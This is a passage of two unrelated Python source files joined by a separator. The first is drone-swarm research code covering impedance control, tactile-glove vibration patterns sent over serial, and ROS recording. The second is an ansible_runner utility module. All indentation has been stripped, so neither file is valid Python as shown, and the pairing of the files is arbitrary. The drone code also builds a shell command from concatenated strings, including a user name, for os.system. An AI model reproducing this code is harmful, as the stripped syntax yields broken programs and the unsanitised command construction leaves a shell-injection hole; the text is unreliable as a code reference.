J = 1.; b = 10.; k = 0.
dydt = [omega, (M - b*omega - k*np.sin(theta)) / J ]
return dydt
# theta_from_pose returns angle between 2 vectors: X and [drone_pose-obstacle_pose]' in XY-plane
def theta_from_pose(drone_pose, obstacle_pose):
# #[0, 2pi] - range
# if drone_pose[1] >= obstacle_pose[1]:
# theta = acos( (drone_pose[0]-obstacle_pose[0]) / np.linalg.norm(drone_pose[:2] - obstacle_pose[:2]) )
# else:
# theta = 2*pi - acos( (drone_pose[0]-obstacle_pose[0]) / np.linalg.norm(drone_pose[:2] - obstacle_pose[:2]) )
theta = np.sign(drone_pose[1]-obstacle_pose[1]) * acos( (drone_pose[0]-obstacle_pose[0]) / np.linalg.norm(drone_pose[:2] - obstacle_pose[:2]) ) # [-pi,pi] - range
return theta
# THETA OBSTACLE IMPEDANCE
def impedance_obstacle_theta(theta, imp_theta_prev, imp_omega_prev, time_prev):
M_coeff = 10 # 7
time_step = time.time() - time_prev
time_prev = time.time()
t = [0. , time_step]
M = - sin(imp_theta_prev - theta) * M_coeff
state0 = [imp_theta_prev, imp_omega_prev]
state = odeint(Pendulum, state0, t, args=(M,))
state = state[1]
imp_theta = state[0]
imp_omega = state[1]
return imp_theta, imp_omega, time_prev
def obstacle_status(obstacle_pose_input, drone_pose_sp, imp_pose_from_theta, human_pose, R, flew_in, flew_out):
obstacle_pose = np.array([ obstacle_pose_input[0], obstacle_pose_input[1] ])
drone_sp = np.array([ drone_pose_sp[0] , drone_pose_sp[1] ])
dist = np.linalg.norm(obstacle_pose-drone_sp)
if imp_pose_from_theta is not None:
drone_imp = np.array([ imp_pose_from_theta[0] , imp_pose_from_theta[1] ])
d_theta = theta_from_pose(drone_sp, obstacle_pose) - theta_from_pose(drone_imp, obstacle_pose)
else:
d_theta = pi
#S = sin(d_theta)
if dist<R+0.03:
# the drone is near the obstacle
flew_in += 1
flew_out = 0
#elif dist>R and (S > 0 and S < 1):
#elif dist>R and np.linalg.norm(object_pose_input-human_pose_input)<1.1:
elif dist>R and abs( d_theta ) < pi/3.:
print "flew_out: "+"dist="+str(dist>R)+", d_theta="+str(180/pi*d_theta)
flew_in = 0
flew_out += 1
return flew_in, flew_out
# DRONE ANGULAR VELOCITY CALCULATION
drone_time_array = np.ones(10)
drone_pose_array = np.array([ np.ones(10), np.ones(10), np.ones(10) ])
def drone_w(drone_pose, R):
for i in range(len(drone_time_array)-1):
drone_time_array[i] = drone_time_array[i+1]
drone_time_array[-1] = time.time()
for i in range(len(drone_pose_array[0])-1):
drone_pose_array[0][i] = drone_pose_array[0][i+1]
drone_pose_array[1][i] = drone_pose_array[1][i+1]
drone_pose_array[2][i] = drone_pose_array[2][i+1]
drone_pose_array[0][-1] = drone_pose[0]
drone_pose_array[1][-1] = drone_pose[1]
drone_pose_array[2][-1] = drone_pose[2]
vel_x = (drone_pose_array[0][-1]-drone_pose_array[0][0])/(drone_time_array[-1]-drone_time_array[0])
vel_y = (drone_pose_array[1][-1]-drone_pose_array[1][0])/(drone_time_array[-1]-drone_time_array[0])
vel_z = (drone_pose_array[2][-1]-drone_pose_array[2][0])/(drone_time_array[-1]-drone_time_array[0])
drone_vel = np.array( [vel_x, vel_y, vel_z] )
# drone_vel_n = np.dot(drone_vel, R)/(np.linalg.norm(R)**2) * R
# drone_vel_t = drone_vel - drone_vel_n
drone_w = np.cross(drone_vel, R)
return drone_w, drone_vel
# TACTILE ########################################################################################
prev_pattern_time = time.time()
pattern_duration = 0
area_pattern = False
left_right_pattern = False
prev_pattern = 'left_right_pattern'
#___________________________________________________________________________________________________
duration = 4
high_lev = 9
empty = np.zeros((5, 1, 2))
empty = (
[0, 1],
[0, 1],
[0, 1],
[0, 1],
[0, 1])
L = np.zeros((5, 1, 2)) #5,7,9
L = (
[high_lev, duration],
[0, duration],
[0, duration],
[0, duration],
[0, duration])
R = np.zeros((5, 1, 2)) #5,7,9
R = (
[0, duration],
[0, duration],
[0, duration],
[0, duration],
[high_lev, duration])
MR1 = np.zeros((5, 1, 2))
MR1 = (
[0, duration],
[high_lev, duration],
[0, duration],
[0, duration],
[0, duration])
MR2 = np.zeros((5, 1, 2))
MR2 = (
[0, duration],
[0, duration],
[high_lev, duration],
[0, duration],
[0, duration])
MR3 = np.zeros((5, 1, 2))
MR3 = (
[0, duration],
[0, duration],
[0, duration],
[high_lev, duration],
[0, duration])
ML1 = np.zeros((5, 1, 2))
ML1 = (
[0, duration],
[0, duration],
[0, duration],
[high_lev, duration],
[0, duration])
ML2 = np.zeros((5, 1, 2))
ML2 = (
[0, duration],
[0, duration],
[high_lev, duration],
[0, duration],
[0, duration])
ML3 = np.zeros((5, 1, 2))
ML3 = (
[0, duration],
[high_lev, duration],
[0, duration],
[0, duration],
[0, duration])
M1 = np.zeros((5, 1, 2))
M1 = (
[0, duration],
[high_lev, duration*2],
[high_lev, duration*2],
[high_lev, duration*2],
[0, duration])
#________________________________________________________________________________________________________
#Decreasing distance (extended state)
P9=[]
P9.append(np.copy(R))
P10=[]
P10.append(np.copy(L))
P11=[]
P11.append(np.copy(MR1))
P11.append(np.copy(MR2))
P11.append(np.copy(MR3))
P12=[]
P12.append(np.copy(ML1))
P12.append(np.copy(ML2))
P12.append(np.copy(ML3))
P13=[]
P13.append(np.copy(M1))
from std_msgs.msg import String
str_msg = String()
pub = rospy.Publisher('pattern_topic', String, queue_size=10)
def patter_publisher(pattern_type):
str_msg.data = pattern_type
pub.publish(str_msg)
def tactile_patterns(drone1, drone2, drone3, human, l, move_right, move_left):
global prev_pattern_time
global pattern_duration
global area_pattern
global left_right_pattern
global prev_pattern
# AREA calc
# https://stackoverflow.com/questions/24467972/calculate-area-of-polygon-given-x-y-coordinates
x = np.array([drone1.sp[0], drone2.sp[0], drone3.sp[0]])
y = np.array([drone1.sp[1], drone2.sp[1], drone3.sp[1]])
def PolyArea(x,y):
return 0.5*np.abs(np.dot(x,np.roll(y,1))-np.dot(y,np.roll(x,1)))
# print 'PolyArea(x,y)', PolyArea(x,y)
default_area = l*l*math.sqrt(3)/4
if (time.time()-prev_pattern_time)>(pattern_duration):
patter_publisher('')
extended = False
contracted = False
if PolyArea(x,y)>default_area*1.1 or (drone2.sp[1] - drone3.sp[1])>l*1.075:
extended = True
elif PolyArea(x,y)<default_area*0.9:
contracted = True
# centroid = centroid_calc(drone1, drone2, drone3)
if extended and move_left:
print 'pattern extended RIGHT'
pattern_duration = Send(P9)
patter_publisher('extended_right')
if extended and move_right:
print 'pattern extended LEFT'
pattern_duration = Send(P10)
patter_publisher('extended_left')
if contracted and move_right:
print 'pattern contracted RIGHT'
pattern_duration = Send(P11)
patter_publisher('contracted_right')
if contracted and move_left:
print 'pattern contracted LEFT'
pattern_duration = Send(P12)
patter_publisher('contracted_left')
if contracted or extended:
prev_pattern_time = time.time()
# # Patterns manager
# if default_area*0.80<PolyArea(x,y)<default_area*1.20:
# area_pattern = False
# else:
# area_pattern = True
# centroid = centroid_calc(drone1, drone2, drone3)
# if -0.02<(centroid[1] - human.pose[1])<0.02:
# left_right_pattern = False
# else:
# left_right_pattern = True
# # a=1, lr=1
# if area_pattern and left_right_pattern:
# if prev_pattern == "area_pattern":
# # Start left_right pattern
# centroid = centroid_calc(drone1, drone2, drone3)
# if PolyArea(x,y)<default_area:
# contracted = True
# extended = False
# else:
# contracted = False
# extended = True
# if (centroid[1] - human.pose[1])>0.02 and contracted:
# print 'pattern RIGHT'
# pattern_duration = right_pattern()
# prev_pattern_time = time.time()
# if (centroid[1] - human.pose[1])>0.02 and extended:
# print 'pattern LEFT'
# pattern_duration = left_pattern()
# prev_pattern_time = time.time()
# if (centroid[1] - human.pose[1])<-0.02 and contracted:
# print 'pattern LEFT'
# pattern_duration = left_pattern()
# prev_pattern_time = time.time()
# if (centroid[1] - human.pose[1])<-0.02 and extended:
# print 'pattern RIGHT'
# pattern_duration = right_pattern()
# prev_pattern_time = time.time()
# prev_pattern = 'left_right_pattern'
# else:
# # Start area pattern
# if PolyArea(x,y)>default_area*1.20:
# print "extended, area = ", PolyArea(x,y)
# pattern_duration = extended_pattern()
# prev_pattern_time = time.time()
# elif default_area*0.65<PolyArea(x,y)<default_area*0.80:
# print "contracted, area = ", PolyArea(x,y)
# pattern_duration = contracted_pattern()
# prev_pattern_time = time.time()
# elif PolyArea(x,y)<default_area*0.65:
# print "too contracted, area = ", PolyArea(x,y)
# pattern_duration = too_contracted_pattern()
# prev_pattern_time = time.time()
# prev_pattern = "area_pattern"
# # a=1 lr=0, a=0 lr=1
# if area_pattern and not left_right_pattern:
# # Start area pattern
# if PolyArea(x,y)>default_area*1.20:
# print "extended, area = ", PolyArea(x,y)
# pattern_duration = extended_pattern()
# prev_pattern_time = time.time()
# elif default_area*0.65<PolyArea(x,y)<default_area*0.80:
# print "contracted, area = ", PolyArea(x,y)
# pattern_duration = contracted_pattern()
# prev_pattern_time = time.time()
# elif PolyArea(x,y)<default_area*0.65:
# print "too contracted, area = ", PolyArea(x,y)
# pattern_duration = too_contracted_pattern()
# prev_pattern_time = time.time()
# if left_right_pattern and not area_pattern:
# # Start left_right pattern
# # print "only left_right_pattern"
# centroid = centroid_calc(drone1, drone2, drone3)
# if PolyArea(x,y)<default_area:
# contracted = True
# extended = False
# else:
# contracted = False
# extended = True
# if (centroid[1] - human.pose[1])>0.02 and contracted:
# print 'pattern RIGHT'
# pattern_duration = right_pattern()
# prev_pattern_time = time.time()
# if (centroid[1] - human.pose[1])>0.02 and extended:
# print 'pattern LEFT'
# pattern_duration = left_pattern()
# prev_pattern_time = time.time()
# if (centroid[1] - human.pose[1])<-0.02 and contracted:
# print 'pattern LEFT'
# pattern_duration = left_pattern()
# prev_pattern_time = time.time()
# if (centroid[1] - human.pose[1])<-0.02 and extended:
# print 'pattern RIGHT'
# pattern_duration = right_pattern()
# prev_pattern_time = time.time()
# if PolyArea(x,y)>default_area*1.20:
# print "extended, area = ", PolyArea(x,y)
# pattern_duration = extended_pattern()
# prev_pattern_time = time.time()
# elif default_area*0.65<PolyArea(x,y)<default_area*0.80:
# print "contracted, area = ", PolyArea(x,y)
# pattern_duration = contracted_pattern()
# prev_pattern_time = time.time()
# elif PolyArea(x,y)<default_area*0.65:
# print "too contracted, area = ", PolyArea(x,y)
# pattern_duration = too_contracted_pattern()
# prev_pattern_time = time.time()
# centroid = centroid_calc(drone1, drone2, drone3)
# if (centroid[1] - human.pose[1])>0.02:
# print 'pattern RIGHT'
# pattern_duration = right_pattern()
# prev_pattern_time = time.time()
# if (centroid[1] - human.pose[1])<-0.02:
# print 'pattern LEFT'
# pattern_duration = left_pattern()
# prev_pattern_time = time.time()
# centroid = centroid_calc(drone1, drone2, drone3)
# if PolyArea(x,y)<default_area:
# contracted = True
# extended = False
# else:
# contracted = False
# extended = True
# if (centroid[1] - human.pose[1])>0.02 and contracted:
# print 'pattern RIGHT'
# pattern_duration = right_pattern()
# prev_pattern_time = time.time()
# if (centroid[1] - human.pose[1])>0.02 and extended:
# print 'pattern LEFT'
# pattern_duration = left_pattern()
# prev_pattern_time = time.time()
# if (centroid[1] - human.pose[1])<-0.02 and contracted:
# print 'pattern LEFT'
# pattern_duration = left_pattern()
# prev_pattern_time = time.time()
# if (centroid[1] - human.pose[1])<-0.02 and extended:
# print 'pattern RIGHT'
# pattern_duration = right_pattern()
# prev_pattern_time = time.time()
def extended_pattern():
# 1st column is intensity levels between 0-9
#2nd column is timing between 0-9
time = 4
C = np.zeros((5, 1, 2))
C = (
[9, time],
[0, time],
[0, time],
[0, time],
[8, time])
P= []
P.append(np.copy(C))
pattern_duration = Send(P)
return pattern_duration
def contracted_pattern():
# 1st column is intensity levels between 0-9
#2nd column is timing between 0-999
time = 3
C = np.zeros((5, 1, 2))
C = (
[0, time],
[0, time],
[9, time],
[0, time],
[0, time])
P= []
P.append(np.copy(C))
pattern_duration = Send(P)
return pattern_duration
def too_contracted_pattern():
# 1st column is intensity levels between 0-9
#2nd column is timing between 0-999
time = 5
C = np.zeros((5, 1, 2))
C = (
[0, time],
[9, time],
[9, time],
[9, time],
[0, time])
P= []
P.append(np.copy(C))
pattern_duration = Send(P)
return pattern_duration
F = np.zeros((5, 1, 2)) #5,7,9
F = (
[high_lev, duration],
[0, duration],
[0, duration],
[0, duration],
[0, duration])
F1 = np.zeros((5, 1, 2))
F1 = (
[0, duration],
[0, duration],
[high_lev, duration],
[0, duration],
[0, duration])
F2 = np.zeros((5, 1, 2))
F2 = (
[0, duration],
[0, duration],
[0, duration],
[0, duration],
[high_lev, duration])
F_ = np.zeros((5, 1, 2))
F_ = (
[0, duration],
[high_lev, duration],
[0, duration],
[0, duration],
[0, duration])
F__ = np.zeros((5, 1, 2))
F__ = (
[0, duration],
[0, duration],
[0, duration],
[high_lev, duration],
[0, duration])
def right_pattern():
P7=[]
P7.append(np.copy(F))
P7.append(np.copy(empty))#P7.append(np.copy(F_))
P7.append(np.copy(F1))
P7.append(np.copy(empty))#P7.append(np.copy(F__))
P7.append(np.copy(F2))
pattern_duration = Send(P7)
return pattern_duration
def left_pattern():
P8=[]
P8.append(np.copy(F2))
P8.append(np.copy(empty))#P8.append(np.copy(F__))
P8.append(np.copy(F1))
P8.append(np.copy(empty))#P8.append(np.copy(F_))
P8.append(np.copy(F))
pattern_duration = Send(P8)
return pattern_duration
def startXbee():
global serial_port
# serial_port = serial.Serial('/dev/ttyUSB0', 9600)
serial_port = serial.Serial('/dev/serial/by-id/usb-Arduino__www.arduino.cc__0043_956353330313512012D0-if00', 9600)
def Send(Mat):
max = np.zeros(1)
max[0] = 0
for i in range(len(Mat)):
max[0] = max[0] + np.amax(Mat[i][:,1])*100
serial_port = serial.Serial('/dev/serial/by-id/usb-Arduino__www.arduino.cc__0043_956353330313512012D0-if00', 9600)
t =matrix_send(Mat)
serial_port.close()
t2=(max[0] / 1000.0)+t
return t2
def matrix_send(Matr):
X = np.zeros((5, 1, 2))
X = (
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0])
matrix = np.copy(Matr)
for i in range(len(matrix)):
Z = np.copy(matrix[i])
for k in range(len(Z)):
item = '%s\r' % Z[k][0]
serial_port.write(item.encode())
# print("raw1", Z[k][0])
for n in range(len(Z)):
item = '%s\r' % Z[n][1]
serial_port.write(item.encode())
# print("raw1", Z[n][1])
for i in range (5- len(matrix)):
Z = np.copy(X)
for k in range(len(Z)):
item = '%s\r' % Z[k][0]
serial_port.write(item.encode())
# print("raw1", Z[k][0])
for n in range(len(Z)):
item = '%s\r' % Z[n][1]
serial_port.write(item.encode())
# print("raw1", Z[n][1])
return 0.1*(5- len(matrix))
def recorder(cf1_name, cf2_name, cf3_name, human_name, obstacle_list, user_name, tacile_glove_on):
if tacile_glove_on:
user_name = user_name+'_with_glove'
else:
user_name = user_name+'_wo_glove'
obstacle_topics = ''
for i in range(len(obstacle_list)):
obstacle_topics = obstacle_topics +" /vicon/"+obstacle_list[i]+"/"+obstacle_list[i]
os.system("rosbag record -o /home/drone/SwarmTouchData/"+user_name+" /vicon/"+cf1_name+"/"+cf1_name+" /vicon/"+cf2_name+"/"+cf2_name+" /vicon/"+cf3_name+"/"+cf3_name+" /vicon/"+human_name+"/"+human_name+obstacle_topics+" /"+cf1_name+"_sp"+" /"+cf2_name+"_sp"+" /"+cf3_name+"_sp"+' /pattern_topic')
# os.system("rosbag record -o /home/drone/SwarmTouchData/"+user_name + " -a")
# os.system("rosbag record -a")
def start_recording(cf1_name, cf2_name, cf3_name, human_name, obstacle_list, user_name, tacile_glove_on):
pose_recording = Process(target=recorder, args=(cf1_name, cf2_name, cf3_name, human_name, obstacle_list, user_name, tacile_glove_on,))
pose_recording.start()
def killer_of_recorder():
print 'killing the recorder'
node_list = os.popen("rosnode list").read()
print node_list
for i in range(len(node_list)):
if node_list[i:i+5] == '/reco':
range_from = i
range_to = i + 27
break
os.system('rosnode kill '+ node_list[range_from:range_to])
# IMPEDANCE ####################################################################################
# OBJECT VELOCITY CALCULATION
time_array = np.ones(10)
pose_array = np.array([ np.ones(10), np.ones(10), np.ones(10) ])
def velocity(pose):
for i in range(len(time_array)-1):
time_array[i] = time_array[i+1]
time_array[-1] = time.time()
for i in range(len(pose_array[0])-1):
pose_array[0][i] = pose_array[0][i+1]
pose_array[1][i] = pose_array[1][i+1]
pose_array[2][i] = pose_array[2][i+1]
pose_array[0][-1] = pose[0]
pose_array[1][-1] = pose[1]
pose_array[2][-1] = pose[2]
vel_x = (pose_array[0][-1]-pose_array[0][0])/(time_array[-1]-time_array[0])
vel_y = (pose_array[1][-1]-pose_array[1][0])/(time_array[-1]-time_array[0])
vel_z = (pose_array[2][-1]-pose_array[2][0])/(time_array[-1]-time_array[0])
vel = np.array( [vel_x, vel_y, vel_z] )
return vel
# HUMAN IMPEDANCE
def MassSpringDamper(state,t,F):
x = state[0]
xd = state[1]
m = 2.0 # Kilograms
b = 12.6
k = 20.0 # Newtons per meter
xdd = -(b/m)*xd - (k/m)*x + F/m
return [xd, xdd]
def impedance_human(hum_vel, imp_pose_prev, imp_vel_prev, time_prev):
F_coeff = 12 # 7
time_step = time.time() - time_prev
time_prev = time.time()
t = [0. , time_step]
if hum_vel[0]<0:
hum_vel[0] = - hum_vel[0]
F = - hum_vel * F_coeff
state0_x = [imp_pose_prev[0], imp_vel_prev[0]]
state_x = odeint(MassSpringDamper, state0_x, t, args=(F[0],))
state_x = state_x[1]
state0_y = [imp_pose_prev[1], imp_vel_prev[1]]
state_y = odeint(MassSpringDamper, state0_y, t, args=(F[1],))
state_y = state_y[1]
state0_z = [imp_pose_prev[2], imp_vel_prev[2]]
state_z = odeint(MassSpringDamper, state0_z, t, args=(F[2],))
state_z = state_z[1]
imp_pose = np.array( [state_x[0], state_y[0], state_z[0]] )
imp_vel = np.array( [state_x[1], state_y[1], state_z[1]] )
return imp_pose, imp_vel, time_prev
def MassSpringDamper_rad_imp(state,t,F):
x = state[0]
xd = state[1]
m = 2.0 # Kilograms
b = 20.0
k = 20.0 # Newtons per meter
xdd = -(b/m)*xd - (k/m)*x + F/m
return [xd, xdd]
# Radius OBSTACLE IMPEDANCE
def radius_obstacle_impedance(drone):
F_coeff = 12 # 7
time_step = time.time() - drone.rad_imp.time_prev
drone.rad_imp.time_prev = time.time()
t = [0. , time_step]
F = np.linalg.norm(drone.rad_imp.penetration) * F_coeff
state0 = [drone.rad_imp.imp_pose, drone.rad_imp.imp_vel]
state = odeint(MassSpringDamper_rad_imp, state0, t, args=(F,))
state = state[1]
imp_pose = state[0]
imp_vel = state[1]
drone.rad_imp.imp_pose = imp_pose
drone.rad_imp.imp_vel = imp_vel
# step towartd the center TODO: male beauty
v = - drone.sp[:2] + drone.nearest_obstacle.pose[:2]
v = v/np.linalg.norm(v)
v = v*drone.rad_imp.imp_pose
drone.sp[0] = drone.sp[0] + v[0]
drone.sp[1] = drone.sp[1] + v[1]
return drone
def pub_circle_traj(x0,y0,z0,r,i):
# i=0
# while time_delay<delay:
x1 = x0 + r*sin(i*1.75*pi/360) # 1
y1 = y0 + r*cos(i*1.75*pi/360) # 1
z1 = z0
drone10_pose_goal = np.array([ x1,y1,z1 ])
x2 = x0 + r*sin(i*1.75*pi/360+pi) # 2
y2 = y0 + r*cos(i*1.75*pi/360+pi) # 2
z2 = z0
drone11_pose_goal = np.array([ x2,y2,z2 ])
i = i+1
publish_pose(drone10_pose_goal, 0, "drone10_pose_goal")
publish_pose(drone11_pose_goal, 0, "drone11_pose_goal")
return i, drone10_pose_goal, drone11_pose_goal
|
__init__.py
|
import json
import sys
import re
import os
import stat
import fcntl
import shutil
import hashlib
import tempfile
import subprocess
import base64
import threading
import pipes
import uuid
import codecs
from distutils.spawn import find_executable
from ansible_runner.exceptions import ConfigurationError
try:
from collections.abc import Iterable, Mapping
except ImportError:
from collections import Iterable, Mapping
from io import StringIO
from six import string_types, PY2, PY3, text_type, binary_type
class Bunch(object):
'''
Collect a bunch of variables together in an object.
This is a slight modification of Alex Martelli's and Doug Hudgeon's Bunch pattern.
'''
def __init__(self, **kwargs):
self.update(**kwargs)
def update(self, **kwargs):
self.__dict__.update(kwargs)
def get(self, key):
return self.__dict__.get(key)
def isplaybook(obj):
'''
Inspects the object and returns if it is a playbook
Args:
obj (object): The object to be inspected by this function
Returns:
boolean: True if the object is a list and False if it is not
'''
return isinstance(obj, Iterable) and (not isinstance(obj, string_types) and not isinstance(obj, Mapping))
def isinventory(obj):
'''
Inspects the object and returns if it is an inventory
Args:
obj (object): The object to be inspected by this function
Returns:
boolean: True if the object is an inventory dict and False if it is not
'''
return isinstance(obj, Mapping) or isinstance(obj, string_types)
def check_isolation_executable_installed(isolation_executable):
'''
Check that process isolation executable (e.g. podman, docker, bwrap) is installed.
'''
cmd = [isolation_executable, '--version']
try:
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
proc.communicate()
return bool(proc.returncode == 0)
except (OSError, ValueError) as e:
if isinstance(e, ValueError) or getattr(e, 'errno', 1) != 2: # ENOENT, no such file or directory
raise RuntimeError(f'{isolation_executable} unavailable for unexpected reason.')
return False
def dump_artifact(obj, path, filename=None):
'''
Write the artifact to disk at the specified path
Args:
obj (string): The string object to be dumped to disk in the specified
path. The artifact filename will be automatically created
path (string): The full path to the artifacts data directory.
filename (string, optional): The name of file to write the artifact to.
If the filename is not provided, then one will be generated.
Returns:
string: The full path filename for the artifact that was generated
'''
p_sha1 = None
if not os.path.exists(path):
os.makedirs(path, mode=0o700)
else:
p_sha1 = hashlib.sha1()
p_sha1.update(obj.encode(encoding='UTF-8'))
if filename is None:
fd, fn = tempfile.mkstemp(dir=path)
else:
fn = os.path.join(path, filename)
if os.path.exists(fn):
c_sha1 = hashlib.sha1()
with open(fn) as f:
contents = f.read()
c_sha1.update(contents.encode(encoding='UTF-8'))
if not os.path.exists(fn) or p_sha1.hexdigest() != c_sha1.hexdigest():
lock_fp = os.path.join(path, '.artifact_write_lock')
lock_fd = os.open(lock_fp, os.O_RDWR | os.O_CREAT, stat.S_IRUSR | stat.S_IWUSR)
fcntl.lockf(lock_fd, fcntl.LOCK_EX)
try:
with open(fn, 'w') as f:
os.chmod(fn, stat.S_IRUSR)
f.write(str(obj))
finally:
fcntl.lockf(lock_fd, fcntl.LOCK_UN)
os.close(lock_fd)
os.remove(lock_fp)
return fn
def cleanup_artifact_dir(path, num_keep=0):
# 0 disables artifact dir cleanup/rotation
if num_keep < 1:
return
all_paths = sorted([os.path.join(path, p) for p in os.listdir(path)],
key=lambda x: os.path.getmtime(x))
total_remove = len(all_paths) - num_keep
for f in range(total_remove):
shutil.rmtree(all_paths[f])
def dump_artifacts(kwargs):
'''
Introspect the kwargs and dump objects to disk
'''
private_data_dir = kwargs.get('private_data_dir')
if not private_data_dir:
private_data_dir = tempfile.mkdtemp()
kwargs['private_data_dir'] = private_data_dir
if not os.path.exists(private_data_dir):
raise ValueError('private_data_dir path is either invalid or does not exist')
if 'role' in kwargs:
role = {'name': kwargs.pop('role')}
if 'role_vars' in kwargs:
role['vars'] = kwargs.pop('role_vars')
play = [{'hosts': kwargs.pop('hosts', 'all'), 'roles': [role]}]
if kwargs.pop('role_skip_facts', False):
play[0]['gather_facts'] = False
kwargs['playbook'] = play
if 'envvars' not in kwargs:
kwargs['envvars'] = {}
roles_path = kwargs.pop('roles_path', None)
if not roles_path:
roles_path = os.path.join(private_data_dir, 'roles')
else:
roles_path += ':{}'.format(os.path.join(private_data_dir, 'roles'))
kwargs['envvars']['ANSIBLE_ROLES_PATH'] = roles_path
obj = kwargs.get('playbook')
if obj and isplaybook(obj):
path = os.path.join(private_data_dir, 'project')
kwargs['playbook'] = dump_artifact(json.dumps(obj), path, 'main.json')
obj = kwargs.get('inventory')
if obj and isinventory(obj):
path = os.path.join(private_data_dir, 'inventory')
if isinstance(obj, Mapping):
kwargs['inventory'] = dump_artifact(json.dumps(obj), path, 'hosts.json')
elif isinstance(obj, string_types):
if not os.path.exists(obj):
kwargs['inventory'] = dump_artifact(obj, path, 'hosts')
for key in ('envvars', 'extravars', 'passwords', 'settings'):
obj = kwargs.get(key)
if obj and not os.path.exists(os.path.join(private_data_dir, 'env', key)):
path = os.path.join(private_data_dir, 'env')
dump_artifact(json.dumps(obj), path, key)
kwargs.pop(key)
for key in ('ssh_key', 'cmdline'):
obj = kwargs.get(key)
if obj and not os.path.exists(os.path.join(private_data_dir, 'env', key)):
path = os.path.join(private_data_dir, 'env')
dump_artifact(str(kwargs[key]), path, key)
kwargs.pop(key)
def collect_new_events(event_path, old_events):
'''
Collect new events for the 'events' generator property
'''
dir_events = os.listdir(event_path)
dir_events_actual = []
for each_file in dir_events:
if re.match("^[0-9]+-.+json$", each_file):
if '-partial' not in each_file and each_file not in old_events.keys():
dir_events_actual.append(each_file)
dir_events_actual.sort(key=lambda filenm: int(filenm.split("-", 1)[0]))
for event_file in dir_events_actual:
with codecs.open(os.path.join(event_path, event_file), 'r', encoding='utf-8') as event_file_actual:
try:
event = json.load(event_file_actual)
except ValueError:
break
old_events[event_file] = True
yield event, old_events
class OutputEventFilter(object):
'''
File-like object that looks for encoded job events in stdout data.
'''
EVENT_DATA_RE = re.compile(r'\x1b\[K((?:[A-Za-z0-9+/=]+\x1b\[\d+D)+)\x1b\[K')
def __init__(self, handle, event_callback,
suppress_ansible_output=False, output_json=False):
self._event_callback = event_callback
self._counter = 0
self._start_line = 0
self._handle = handle
self._buffer = StringIO()
self._last_chunk = ''
self._current_event_data = None
self.output_json = output_json
self.suppress_ansible_output = suppress_ansible_output
def flush(self):
self._handle.flush()
def write(self, data):
self._buffer.write(data)
# keep a sliding window of the last chunk written so we can detect
# event tokens and determine if we need to perform a search of the full
# buffer
should_search = '\x1b[K' in (self._last_chunk + data)
self._last_chunk = data
# Only bother searching the buffer if we recently saw a start/end
# token (\x1b[K)
while should_search:
value = self._buffer.getvalue()
match = self.EVENT_DATA_RE.search(value)
if not match:
break
try:
base64_data = re.sub(r'\x1b\[\d+D', '', match.group(1))
event_data = json.loads(base64.b64decode(base64_data).decode('utf-8'))
except ValueError:
event_data = {}
event_data = self._emit_event(value[:match.start()], event_data)
if not self.output_json:
stdout_actual = event_data['stdout'] if 'stdout' in event_data else None
else:
stdout_actual = json.dumps(event_data)
remainder = value[match.end():]
self._buffer = StringIO()
self._buffer.write(remainder)
if stdout_actual and stdout_actual != "{}":
if not self.suppress_ansible_output:
sys.stdout.write(
stdout_actual.encode('utf-8') if PY2 else stdout_actual
)
sys.stdout.write("\n")
sys.stdout.flush()
self._handle.write(stdout_actual + "\n")
self._handle.flush()
self._last_chunk = remainder
else:
# Verbose stdout outside of event data context
if data and '\n' in data and self._current_event_data is None:
# emit events for all complete lines we know about
lines = self._buffer.getvalue().splitlines(True) # keep ends
remainder = None
# if last line is not a complete line, then exclude it
if '\n' not in lines[-1]:
remainder = lines.pop()
# emit all complete lines
for line in lines:
self._emit_event(line)
if not self.suppress_ansible_output:
sys.stdout.write(
line.encode('utf-8') if PY2 else line
)
self._handle.write(line)
self._handle.flush()
self._buffer = StringIO()
# put final partial line back on buffer
if remainder:
self._buffer.write(remainder)
def close(self):
value = self._buffer.getvalue()
if value:
self._emit_event(value)
self._buffer = StringIO()
self._event_callback(dict(event='EOF'))
self._handle.close()
def _emit_event(self, buffered_stdout, next_event_data=None):
next_event_data = next_event_data or {}
if self._current_event_data:
event_data = self._current_event_data
stdout_chunks = [buffered_stdout]
elif buffered_stdout:
event_data = dict(event='verbose')
stdout_chunks = buffered_stdout.splitlines(True)
else:
event_data = dict()
stdout_chunks = []
for stdout_chunk in stdout_chunks:
if event_data.get('event') == 'verbose':
event_data['uuid'] = str(uuid.uuid4())
self._counter += 1
event_data['counter'] = self._counter
event_data['stdout'] = stdout_chunk[:-2] if len(stdout_chunk) > 2 else ""
n_lines = stdout_chunk.count('\n')
event_data['start_line'] = self._start_line
event_data['end_line'] = self._start_line + n_lines
self._start_line += n_lines
if self._event_callback:
self._event_callback(event_data)
if next_event_data.get('uuid', None):
self._current_event_data = next_event_data
else:
self._current_event_data = None
return event_data
def open_fifo_write(path, data):
'''open_fifo_write opens the fifo named pipe in a new thread.
This blocks the thread until an external process (such as ssh-agent)
reads data from the pipe.
'''
os.mkfifo(path, stat.S_IRUSR | stat.S_IWUSR)
threading.Thread(target=lambda p, d: open(p, 'wb').write(d),
args=(path, data)).start()
def args2cmdline(*args):
return ' '.join([pipes.quote(a) for a in args])
def ensure_str(s, encoding='utf-8', errors='strict'):
"""
Copied from six==1.12
Coerce *s* to `str`.
For Python 2:
- `unicode` -> encoded to `str`
- `str` -> `str`
For Python 3:
- `str` -> `str`
- `bytes` -> decoded to `str`
"""
if not isinstance(s, (text_type, binary_type)):
raise TypeError("not expecting type '%s'" % type(s))
if PY2 and isinstance(s, text_type):
s = s.encode(encoding, errors)
elif PY3 and isinstance(s, binary_type):
s = s.decode(encoding, errors)
return s
def sanitize_container_name(original_name):
"""
Docker and podman will only accept certain characters in container names
This takes a given name from user-specified values and replaces the
invalid characters so it can be used in docker/podman CLI commands
"""
return re.sub('[^a-zA-Z0-9_-]', '_', text_type(original_name))
def cli_mounts():
return [
{
'ENVS': ['SSH_AUTH_SOCK'],
'PATHS': [
{
'src': '{}/.ssh/'.format(os.environ['HOME']),
'dest': '/home/runner/.ssh/'
},
{
'src': '/etc/ssh/ssh_known_hosts',
'dest': '/etc/ssh/ssh_known_hosts'
}
]
},
]
def santize_json_response(data):
'''
Removes warning message from response message emitted by ansible
command line utilities.
:param action: The string data to be santizied
:type action: str
'''
start_re = re.compile("{(.|\n)*", re.MULTILINE)
data = start_re.search(data).group().strip()
return data
def get_executable_path(name):
exec_path = find_executable(name)
if exec_path is None:
raise ConfigurationError(f"{name} command not found")
